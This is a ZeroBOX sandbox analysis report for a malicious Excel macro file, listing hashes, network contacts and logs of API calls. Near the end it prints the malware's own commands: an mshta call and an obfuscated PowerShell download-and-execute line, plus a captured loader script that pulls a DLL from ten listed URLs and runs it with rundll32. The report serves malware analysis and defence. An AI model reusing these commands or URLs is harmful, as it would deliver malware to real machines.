popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

GuyYvg-537.xlsm

Generic Malware Malicious Library Antivirus UPX Malicious Packer DLL OS Processor Check PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Jan. 19, 2022, 5:37 p.m. Jan. 19, 2022, 5:39 p.m.
Size 114.8KB
Type Microsoft Excel 2007+
MD5 c63938abd6377d5c1d48dc02e43ba7ab
SHA256 8cb5a34b606e75e3f34d9e0f5d6abfe0d4debd70688a0cfc260e234fd47cece2
CRC32 D3FBBB02
ssdeep 3072:FBbwEvZ8BnW6X1yVkovrepMA5Q6g2X4iHM:dh8lWoGk+eCP6DX4d
Yara None matched

Name Response Post-Analysis Lookup
kastamonulezzetrehberi.com
A 185.98.60.242
185.98.60.242
IP Address Status Action
104.131.62.48 Active Moloch
142.4.219.173 Active Moloch
164.124.101.2 Active Moloch
168.197.250.14 Active Moloch
185.148.168.220 Active Moloch
185.98.60.242 Active Moloch
191.252.103.16 Active Moloch
217.182.143.207 Active Moloch
37.44.244.177 Active Moloch
45.138.98.34 Active Moloch
51.210.242.234 Active Moloch
54.38.242.185 Active Moloch
62.171.178.147 Active Moloch
66.42.57.149 Active Moloch
69.16.218.101 Active Moloch
92.255.57.195 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: IsPublic IsSerial Name BaseType
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: True False Process System.ComponentM...
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: PS C:\Users\test22\Documents>
console_handle: 0x0000002b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbf40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dba40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db440
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002db440
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://92.255.57.195/sec/sec.html
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://92.255.57.195/sec/sec.png
suspicious_features GET method with no useragent header suspicious_request GET http://kastamonulezzetrehberi.com/cszc/rPJJUvdOz/
request GET http://92.255.57.195/sec/sec.html
request GET http://92.255.57.195/sec/sec.png
request GET http://kastamonulezzetrehberi.com/cszc/rPJJUvdOz/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b7c3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ab33000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03940000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03940000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03940000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03943000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03943000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03944000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03945000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03945000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03945000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03947000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03947000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03948000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03948000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03948000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394a000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394a000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1428
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1428
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$GuyYvg-537.xlsm
file C:\Users\Public\Documents\ssd.dll
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000410
filepath: C:\Users\test22\AppData\Local\Temp\~$GuyYvg-537.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$GuyYvg-537.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
file C:\Users\test22\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline mshta http://0x5cff39c3/sec/sec.html
cmdline powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000016c
process_name: tvnserver.exe
process_identifier: 2628
1 1 0

Process32NextW

 snapshot_handle: 0x0000016c
process_name: pw.exe
process_identifier: 2736
1 1 0

Process32NextW

 snapshot_handle: 0x0000016c
process_name: taskhost.exe
process_identifier: 2932
1 1 0

Process32NextW

 snapshot_handle: 0x0000016c
process_name: SearchProtocolHost.exe
process_identifier: 3056
1 1 0

Process32NextW

 snapshot_handle: 0x0000016c
process_name: conhost.exe
process_identifier: 2604
1 1 0

Process32NextW

 snapshot_handle: 0x0000016c
process_name: cmd.exe
process_identifier: 2228
1 1 0

Process32NextW

 snapshot_handle: 0x0000016c
process_name: conhost.exe
process_identifier: 2224
1 1 0

Process32NextW

 snapshot_handle: 0x0000016c
process_name: pw.exe
process_identifier: 2308
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x03940000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Wed, 19 Jan 2022 08:37:20 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Wed, 19 Jan 2022 07:07:05 GMT ETag: "418-5d5ea087c9840" Accept-Ranges: bytes Content-Length: 1048 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/png $path = "C:\Users\Public\Documents\ssd.dll"; $url1 = 'http://kastamonulezzetrehberi.com/cszc/rPJJUvdOz/'; $url2 = 'http://2021.posadamision.com/wp-admin/AxVZTvof0xPasb9nP/'; $url3 = 'http://zhongmaifangwu.com/TEST777/Me53Hh/'; $url4 = 'http://api.task-lite.com/-/ZMZ1Nu/'; $url5 = 'http://auto.lambolero.com/f1nygync/hipC/'; $url6 = 'http://shop.lambolero.com/iiwkjgp/ogffyZoKBoi9/'; $url7 = 'http://t.tops.video/t/1t27KQaE/'; $url8 = 'https://alignerpliers.com/er1lrd/28DnnQ/'; $url9 = 'https://celhocortofilmfestival.stream/css/pY3bEETvftrr/'; $url10 = 'https://doctorkaushik.com/wp-includes/VXSj5Nnd/'; $web = New-Object net.webclient; $urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10".split(","); foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{} } Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;
